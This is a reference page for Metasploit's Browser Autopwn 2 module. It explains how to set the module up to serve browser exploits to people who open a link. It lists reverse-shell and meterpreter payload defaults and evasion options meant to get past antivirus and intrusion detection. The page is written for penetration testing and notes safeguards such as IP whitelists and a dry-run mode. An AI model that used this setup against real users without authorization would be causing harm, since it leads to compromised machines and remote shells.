HTTP Client Automatic Exploiter 2 (Browser Autopwn) - Metasploit
This page contains detailed information about how to use the auxiliary/server/browser_autopwn2 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: HTTP Client Automatic Exploiter 2 (Browser Autopwn)
Module: auxiliary/server/browser_autopwn2
Source code: modules/auxiliary/server/browser_autopwn2.rb
Disclosure date: 2015-07-05
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will automatically serve browser exploits. Here are the options you can configure: The INCLUDE_PATTERN option allows you to specify the kind of exploits to be loaded. For example, if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'. The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash exploits, you can set this. Also note that the Exclude option will always be evaluated after the Include option. The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn. By default, 20 will be loaded. But note that the client will probably not be vulnerable to all 20 of them, so only some will actually be served to the client. The HTMLContent option allows you to provide a basic webpage. This is what the user behind the vulnerable browser will see. You can simply set a string, or you can do the file:// syntax to load an HTML file. Note this option might break exploits so try to keep it as simple as possible. The MaxSessionCount option is used to limit how many sessions Browser Autopwn is allowed to get. The default -1 means unlimited. Combining this with other options such as RealList and Custom404, you can get information about which visitors (IPs) clicked on your malicious link, what exploits they might be vulnerable to, redirect them to your own internal training website without actually attacking them. For more information about Browser Autopwn, please see the referenced blog post.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > exploit
Knowledge Base
Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and feel different for you. Here are the features you should know about before using.
Vulnerable Application
Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:
- Internet Explorer
- Mozilla Firefox
- Adobe Flash
- Java
- ActiveX
- Silverlight
Exploit URLs
Normally, the only URL you need to care about is the BrowserAutoPwn URL. This is the URL you should send to the targets you wish to attack.
For debugging purposes, you can also see each browser exploit's specific URL path. You can do so by setting the VERBOSE option to true in msfconsole, like this:
set VERBOSE true
And then when you run the module, there will be a list showing all the exploits that might be used, including the URLs.
Browser Autopwn 2 Options
The HTMLContent Option
The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a blank one. It supports two syntaxes.
This example will basically print "Hello world!" on the browser while exploits are tested against it.
set HTMLContent Hello world!
This example will load file /tmp/hello_world.html and that's what the browser will see. Most likely the second syntax is how you'd want to use the Content option.
Keep in mind that you should probably try to keep HTMLContent as simple as possible, otherwise there is a possibility that it might actually influence the reliability of the exploits, especially the ones that do memory corruption.
The EXCLUDE_PATTERN option
The EXCLUDE_PATTERN option is used for excluding exploit file names you don't want Browser Autopwn 2 to use. This is a regex type option, you can be creative about this.
For example, Adobe Flash exploits in Metasploit tend to have the same file name that begins with: "adobe_flash_", so to exclude those, you can do:
set EXCLUDE_PATTERN adobe_flash
The INCLUDE_PATTERN option
The INCLUDE_PATTERN option is for loading specific exploits that you want Browser Autopwn 2 to use. Let's reuse the Adobe Flash file name example, if you only want Flash exploits, you can do:
set INCLUDE_PATTERN adobe_flash
If you set both INCLUDE_PATTERN and EXCLUDE_PATTERN, the evaluation for INCLUDE_PATTERN will kick in first, followed by EXCLUDE_PATTERN.
The MaxExploitCount option
The MaxExploitCount option is for specifying how many exploits you want Browser Autopwn 2 to load. By default, it's 21. But you can try to bump it up a little bit if you wish to try more exploits. Note that by doing so you are also allowing more lower ranking modules to kick in, you will have to figure out the sweet spot for it. An example of setting it:
set MaxExploitCount 30
The MaxSessionCount option
The MaxSessionCount option is for limiting how many sessions to get. It may sound a little odd at first because why would you want to do that, right? Well, a use case for this is when you don't actually want to pop shells, instead you just want to know what exploits could be used, this is something you can try. You can also use this if you don't want your attack to stay open the whole time:
set MaxSessionCount 10
The ShowExploitList option
The ShowExploitList option means displaying a list of exploits specific to each browser/client. As we've explained before, when BAP2 loads 21 exploits, probably not all 21 will be served to the browser, only some of them. In order to see those ones, you need to set this option:
set ShowExploitList true
The AllowedAddresses option
The AllowedAddresses option is for attacking a specific range of IPs as a way to avoid penetration testing accidents. For example, when you send a malicious link to a specific person, that person may actually share it with his friends, family or other people, and those people aren't your targets so you shouldn't hit them. Well, Browser Autopwn doesn't know that, so one of the ways to avoid that is to create a whitelist.
The option also supports two syntaxes. This is most likely how you will set it:
set AllowedAddresses file:///tmp/ip_list.txt
The above will load file ip_list.txt. In that file, one IP per line.
The ExploitReloadTimeout option
The ExploitReloadTimeout is for setting how long BAP2 should wait before loading the next exploit. By default, it's 3 seconds, but in case some exploits need more time (for example, longer time to groom the heap, load other things, or it's doing a sleep somewhere), you will need to set this. In most cases, you shouldn't have to.
Here's an example of setting it to 5 seconds:
set ExploitReloadTimeout 5000
Scenarios
By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to test a specific application, basically all you need to do is setting the INCLUDE_PATTERN option (or maybe EXCLUDE_PATTERN).
However, there is another trick to make this task even easier. BAP2 also comes with the following resource scripts that can automatically do this:
- bap_firefox_only.rc - For testing Firefox
- bap_flash_only.rc - Fore testing Adobe Flash
- bap_ie_only.rc - For testing Internet Explorer
- bap_dryrun_only.rc - Rickrolls the target, and shows you all the suitable exploits against that target. No exploits will actually be fired.
Here's an example of using bap_flash_only.rc to test Adobe Flash vulnerabilities:
$ ./msfconsole -q -r scripts/resource/bap_flash_only.rc
Logging
In addition, when a browser connects to BAP, this link-clicking event is also logged to the database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also save the exploit list information so that after testing you can go back to the database and see which users are vulnerable to what exploits.
Even if you don't set the ShowExploitList option, the logged link-clicking event data is more than enough to prove that the user was social-engineered, which is still a security risk.
To see all the bap.clicks events, in msfconsole do:
notes -t bap.clicks
From there, you can do additional analysis of these notes, put it on your report, and hopefully do something about it.
Go back to menu.
Msfconsole Usage
Here is how the server/browser_autopwn2 auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) > show info
Name: HTTP Client Automatic Exploiter 2 (Browser Autopwn)
Module: auxiliary/server/browser_autopwn2
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2015-07-05
Provided by:
sinn3r <[email protected]>
Available actions:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXCLUDE_PATTERN no Pattern search to exclude specific modules
INCLUDE_PATTERN no Pattern search to include specific modules
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Description:
This module will automatically serve browser exploits. Here are the
options you can configure: The INCLUDE_PATTERN option allows you to
specify the kind of exploits to be loaded. For example, if you wish
to load just Adobe Flash exploits, then you can set Include to
'adobe_flash'. The EXCLUDE_PATTERN option will ignore exploits. For
example, if you don't want any Adobe Flash exploits, you can set
this. Also note that the Exclude option will always be evaluated
after the Include option. The MaxExploitCount option specifies the
max number of exploits to load by Browser Autopwn. By default, 20
will be loaded. But note that the client will probably not be
vulnerable to all 20 of them, so only some will actually be served
to the client. The HTMLContent option allows you to provide a basic
webpage. This is what the user behind the vulnerable browser will
see. You can simply set a string, or you can do the file:// syntax
to load an HTML file. Note this option might break exploits so try
to keep it as simple as possible. The MaxSessionCount option is used
to limit how many sessions Browser Autopwn is allowed to get. The
default -1 means unlimited. Combining this with other options such
as RealList and Custom404, you can get information about which
visitors (IPs) clicked on your malicious link, what exploits they
might be vulnerable to, redirect them to your own internal training
website without actually attacking them. For more information about
Browser Autopwn, please see the referenced blog post.
References:
https://blog.rapid7.com/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2
Module Options
This is a complete list of options available in the server/browser_autopwn2 auxiliary module:
msf6 auxiliary(server/browser_autopwn2) > show options
Module options (auxiliary/server/browser_autopwn2):
Name Current Setting Required Description
---- --------------- -------- -----------
EXCLUDE_PATTERN no Pattern search to exclude specific modules
INCLUDE_PATTERN no Pattern search to include specific modules
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
Advanced Options
Here is a complete list of advanced options supported by the server/browser_autopwn2 auxiliary module:
msf6 auxiliary(server/browser_autopwn2) > show advanced
Module advanced options (auxiliary/server/browser_autopwn2):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowedAddresses no A range of IPs you're interested in attacking
CookieExpiration no Cookie expiration in years (blank=expire on exit)
CookieName __ua no The name of the tracking cookie
Custom404 no An external custom 404 URL (Example: http://example.com/404.html)
ExploitReloadTimeout 3000 no Number of milliseconds before trying the next exploit
HTMLContent no HTML Content
JsIdentifiers no Identifiers to preserve for JsObfu
JsObfuscate 0 no Number of times to obfuscate JavaScript
LHOST 192.168.204.3 yes The local host for the exploits and handlers
ListenerComm no The specific communication channel to use for this service
MaxExploitCount 21 no Number of browser exploits to load
MaxSessionCount -1 no Number of sessions to get
PAYLOAD_ANDROID android/meterpreter/reverse_tcp yes Payload for android browser exploits
PAYLOAD_ANDROID_LPORT 4443 yes Payload LPORT for android browser exploits
PAYLOAD_FIREFOX firefox/shell_reverse_tcp yes Payload for firefox browser exploits
PAYLOAD_FIREFOX_LPORT 4442 yes Payload LPORT for firefox browser exploits
PAYLOAD_GENERIC generic/shell_reverse_tcp yes Payload for generic browser exploits
PAYLOAD_GENERIC_LPORT 4459 yes Payload LPORT for generic browser exploits
PAYLOAD_JAVA java/meterpreter/reverse_tcp yes Payload for java browser exploits
PAYLOAD_JAVA_LPORT 4448 yes Payload LPORT for java browser exploits
PAYLOAD_LINUX linux/x86/meterpreter/reverse_tcp yes Payload for linux browser exploits
PAYLOAD_LINUX_LPORT 4445 yes Payload LPORT for linux browser exploits
PAYLOAD_OSX osx/x86/shell_reverse_tcp yes Payload for osx browser exploits
PAYLOAD_OSX_LPORT 4447 yes Payload LPORT for osx browser exploits
PAYLOAD_UNIX cmd/unix/reverse yes Payload for unix browser exploits
PAYLOAD_UNIX_LPORT 4446 yes Payload LPORT for unix browser exploits
PAYLOAD_WIN windows/meterpreter/reverse_tcp yes Payload for win browser exploits
PAYLOAD_WIN_LPORT 4444 yes Payload LPORT for win browser exploits
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SendRobots false no Return a robots.txt file if asked for one
ShowExploitList false yes Show which exploits will actually be served to each client
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/browser_autopwn2 module can do:
msf6 auxiliary(server/browser_autopwn2) > show actions
Auxiliary actions:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
Evasion Options
Here is the full list of possible evasion options supported by the server/browser_autopwn2 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(server/browser_autopwn2) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTML::base64 none no Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape 0 no Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode none no Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #12949 Merged Pull Request: This fixes broken links to the community.rapid7.com blog
- #8888 Merged Pull Request: spelling/grammar fixes part 1
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5839 Merged Pull Request: Pre-Bloggery cleanup
- #5751 Merged Pull Request: Fixup release
- #5739 Merged Pull Request: Resolve #5738, update LHOST, URIHOST, URIPORT options
- #5650 Merged Pull Request: Add Browser Autopwn 2
References
- CVE: Not available
- https://blog.rapid7.com/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2
See Also
Check also the following modules related to this module:
- auxiliary/server/browser_autopwn
- auxiliary/gather/browser_info
- auxiliary/gather/browser_lanipleak
- post/windows/gather/forensics/browser_history
- auxiliary/dos/windows/browser/ms09_065_eot_integer
- auxiliary/dos/android/android_stock_browser_iframe
- auxiliary/gather/android_browser_file_theft
- auxiliary/gather/android_browser_new_tab_cookie_theft
- auxiliary/gather/android_stock_browser_uxss
- auxiliary/gather/samsung_browser_sop_bypass
- auxiliary/server/android_browsable_msf_launch
- auxiliary/server/android_mercury_parseuri
- auxiliary/server/dhclient_bash_env
- auxiliary/server/dhcp
- auxiliary/server/fakedns
- auxiliary/server/ftp
- auxiliary/server/http_ntlmrelay
- auxiliary/server/icmp_exfil
- auxiliary/server/jsse_skiptls_mitm_proxy
- auxiliary/server/ldap
- auxiliary/server/local_hwbridge
- auxiliary/server/ms15_134_mcl_leak
- auxiliary/server/netbios_spoof_nat
- auxiliary/server/openssl_altchainsforgery_mitm_proxy
- auxiliary/server/openssl_heartbeat_client_memory
- auxiliary/server/pxeexploit
- auxiliary/server/regsvr32_command_delivery_server
- auxiliary/server/socks_proxy
- auxiliary/server/socks_unc
- auxiliary/server/teamviewer_uri_smb_redirect
- auxiliary/server/tftp
- auxiliary/server/webkit_xslt_dropper
- auxiliary/server/wget_symlink_file_write
- auxiliary/server/wpad
Authors
- sinn3r
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.